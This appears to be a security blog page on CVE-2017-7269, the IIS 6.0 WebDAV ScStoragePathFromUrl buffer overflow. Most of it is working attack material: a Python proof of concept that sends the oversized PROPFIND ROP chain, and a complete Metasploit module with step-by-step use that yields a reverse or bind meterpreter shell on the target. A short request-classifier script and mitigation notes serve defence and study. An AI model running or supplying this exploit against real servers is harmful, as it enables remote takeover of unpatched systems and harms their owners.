IIS 6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

Vulnerability information

Vulnerability ID: CVE-2017-7269
Discoverers: Zhiniang Peng and Chen Wu (Information Security Laboratory, School of Computer Science and Engineering, South China University of Technology)
Vulnerability brief: IIS 6.0 with the WebDAV service enabled has a buffer overflow that leads to remote code execution. A stable exploit currently exists for Windows Server 2003 R2, and the vulnerability was exploited in the wild as early as July and August 2016.
Vulnerability type: Buffer overflow
Vulnerability level: High risk
Affected product: Microsoft Windows Server 2003 R2, IIS 6.0 with the WebDAV service enabled (this is the verified configuration; other versions have not been verified)
Trigger function: ScStoragePathFromUrl
Additional information: ScStoragePathFromUrl is called twice while the request is processed
Vulnerability details: The ScStoragePathFromUrl function of the WebDAV service in IIS 6.0 on Windows Server 2003 has a buffer overflow. A remote attacker can execute arbitrary code by sending a PROPFIND request with a long header beginning with "If: <http://".

Exploitation conditions

  • IIS 6.0
  • WebDAV enabled (specifically the PROPFIND method; when WebDAV is on, a PROPFIND request is answered with 207 or 200)
  • Windows Server 2003 R2

PoC

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: [email protected]
# (Python 3; the request is built as bytes. The hex escapes are UTF-8 byte sequences that
#  IIS converts to wide characters, and in that wide form they make up the ROP chain.)
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 80))  # replace 127.0.0.1 with the target IP

# Empty body; everything happens in the oversized "If:" header
pay = b'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += b'If: <http://localhost/aaaaaaa'
# first overflowing URL
pay += b'\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += b'>'
pay += b' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
# second overflowing URL (ROP chain)
pay += b'\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
# shellcode that launches calc.exe, appended after the second URL (omitted in this copy of the PoC)
shellcode = b'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'
pay += shellcode
pay += b'>\r\n\r\n'
print(pay)
sock.sendall(pay)
data = sock.recv(80960)
print(data)
sock.close()

PoC from: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py

Change the IP address in sock.connect(('127.0.0.1', 80)) to the target's IP and run the script; a calc.exe (calculator) process is spawned on the target server.
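On the defensive side, the request shape above (a PROPFIND whose If: header carries <http://...> tagged URLs stuffed with non-ASCII UTF-8) is what to hunt for in traffic captures or WAF logs. The following is an added example, not part of the page or of the PoC: it classifies a raw request, and for a flagged one decodes the non-ASCII runs as UTF-8 and re-encodes them as UTF-16LE, which mirrors the wide-character conversion IIS applies to the URL (my explanation; the page does not describe it), so the 32-bit values the overflow lays down become visible. The length threshold and both sample requests are constructed; the short run of exploit bytes in the attack sample is an excerpt from the PoC's first URL.

```python
import re

# Constructed threshold (not from the page): a benign WebDAV If: header is short, while the
# overflowing one runs to well over a kilobyte once the ROP chain and shellcode are included.
MAX_BENIGN_IF_LEN = 512


def parse_request(raw: bytes):
    """Split a raw HTTP request head into (method, target, headers); header names are lower-cased bytes."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify_request(raw: bytes):
    """Return (suspicious, reason). A PROPFIND whose If: header holds a <http://...> tag and is
    either over-long or contains non-ASCII bytes matches the CVE-2017-7269 pattern. A legitimate
    If: header may also contain <http://...> tagged lists, so length or non-ASCII is required."""
    method, _target, headers = parse_request(raw)
    if method.upper() != b"PROPFIND":
        return False, "not a PROPFIND"
    if_hdr = headers.get(b"if")
    if if_hdr is None:
        return False, "no If: header"
    if b"<http://" not in if_hdr.lower():
        return False, "If: header has no <http:// tag"
    non_ascii = sum(1 for b in if_hdr if b >= 0x80)
    if len(if_hdr) > MAX_BENIGN_IF_LEN:
        return True, f"If: header is {len(if_hdr)} bytes long"
    if non_ascii:
        return True, f"If: header contains {non_ascii} non-ASCII bytes"
    return False, "If: header looks benign"


def decode_wide_words(if_hdr: bytes):
    """Decode each non-ASCII run of the If: header as UTF-8, re-encode it as UTF-16LE (the wide
    form IIS works on) and return the resulting 32-bit little-endian words. Grouping assumes the
    run starts 4-byte aligned in the target buffer; shift by one code unit if values look off."""
    words = []
    for run in re.findall(rb"[\x80-\xff]+", if_hdr):
        wide = run.decode("utf-8", errors="replace").encode("utf-16-le")
        for i in range(0, len(wide) - 3, 4):
            words.append(int.from_bytes(wide[i:i + 4], "little"))
    return words


# Constructed sample: the PoC's request line and header prefix with a short excerpt of its first
# overflowing URL in place of the full ROP chain (\xe1\x8f\x80\xe6\xa0\x83 repeats in the PoC).
SAMPLE_ATTACK = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/aaaaaaa\xe6\xbd\xa8\xe7\xa1\xa3\xe1\x8f\x80\xe6\xa0\x83>"
    b" (Not <locktoken:write1>) <http://localhost/bbbbbbb>\r\n\r\n"
)
# Constructed benign request: a conditional PROPFIND with a tagged lock token.
SAMPLE_BENIGN = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: localhost\r\nDepth: 0\r\nContent-Length: 0\r\n"
    b"If: <http://localhost/docs/> (<opaquelocktoken:e71d4fae-5dec-22d6-fea5-00a0c91e6be4>)\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        flagged, reason = classify_request(req)
        print(f"{name}: suspicious={flagged} ({reason})")
        if flagged:
            words = decode_wide_words(parse_request(req)[2][b"if"])
            print("  wide-char words:", [f"0x{w:08x}" for w in words])
```

For the excerpt in the sample the decoder prints 0x78636f68 (a filler value) and 0x680313c0, the address-like word that the PoC's sequence \xe1\x8f\x80\xe6\xa0\x83 becomes after conversion; running it over the full first and second URLs of the PoC shows the whole chain the same way. The classifier deliberately does not flag a PROPFIND merely for having an If: header, since lock-token conditionals are legitimate WebDAV traffic.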

Exploit

The PoC above only verifies that the vulnerability exists; to see the spawned process you have to be logged in to the server. After a foreign expert reworked it, I adapted a Ruby module for msf that returns a reverse shell.

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
      'Description'    => %q{
        Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
        Original exploit by Zhiniang Peng and Chen Wu.
      },
      'Author'         => [ 'Dominic Chell <[email protected]>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', 'CVE-2017-7269'],
          [ 'BID', '97127'],
          [ 'URL', 'https://github.com/edwardz246003/IIS_exploit'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # the shellcode goes through the alphanumeric/unicode mixed encoder, with ESI pointing at the buffer
          'Space'          => 2000,
          'BadChars'       => "\x00",
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'DisableNops'    => 'True',
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESI',
            }
        },
      'DefaultOptions' =>
        {
          'EXITFUNC'           => 'process',
          'PrependMigrate'     => true,
          'PrependMigrateProc' => "calc"
        },
      'Targets'        =>
        [
          [
            'Microsoft Windows Server 2003 R2',
            {
              'Platform' => 'win',
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'March 26 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class)
  end

  def exploit
    connect

    # Oversized "If:" header: two <http://...> tagged URLs whose UTF-8 bytes form the ROP chain once IIS converts them to wide characters
    buf1 = "If: <http://localhost/aaaaaaa"
    buf1 << "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
    buf1 << ">"
    buf1 << " (Not <locktoken:write1>) <http://localhost/bbbbbbb"
    buf1 << "\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"

    # the encoded payload follows the second URL, in place of the PoC's fixed calc.exe shellcode
    buf1 << payload.encoded

    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")

    handler
    disconnect
  end
end

 

GitHub address: https://github.com/dmchell/metasploit-framework/pull/1/commits/9e8ec532a260b1a3f03abd09efcc44c30e4491c2

Usage

  Create a new file, e.g. cve-2017-7269.rb, and paste the code above into it (or download the file directly).
  Find the Metasploit install directory and put cve-2017-7269.rb under opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/. (I tried this on a Mac, where the directory differs; it is placed there simply to keep modules organised.)

Run msfconsole and load the cve-2017-7269 module

> use exploit/windows/iis/cve-2017-7269
> set RHOST 192.168.4.244 # set the target IP
> exploit


  Running exploit starts a listener on port 4444 on the local machine; a vulnerable target connects back to that port and a meterpreter session is returned (provided the target can reach the local machine).

Run the shell command from meterpreter to get a cmd shell

  By default this module loads a reverse_tcp payload, which makes the target connect back to a port on the local machine. We can also change the payload to bind_tcp, which makes the target listen on a port that the local machine then connects to for the shell.

> set PAYLOAD windows/meterpreter/bind_tcp

 

After the change, test again

  Running exploit now makes the target listen on port 4444; the local machine connects to that port and a meterpreter session is returned (provided the local machine can reach the target).

Typing set inside the msf module lists the options that can be changed; it is somewhat more complete than show options.

Temporary workarounds

  • Disable the WebDAV service (on IIS 6.0 it is a Web Service Extension that can be prohibited)
  • Deploy appropriate protective devices (an IPS/WAF that blocks PROPFIND requests with oversized If: headers)
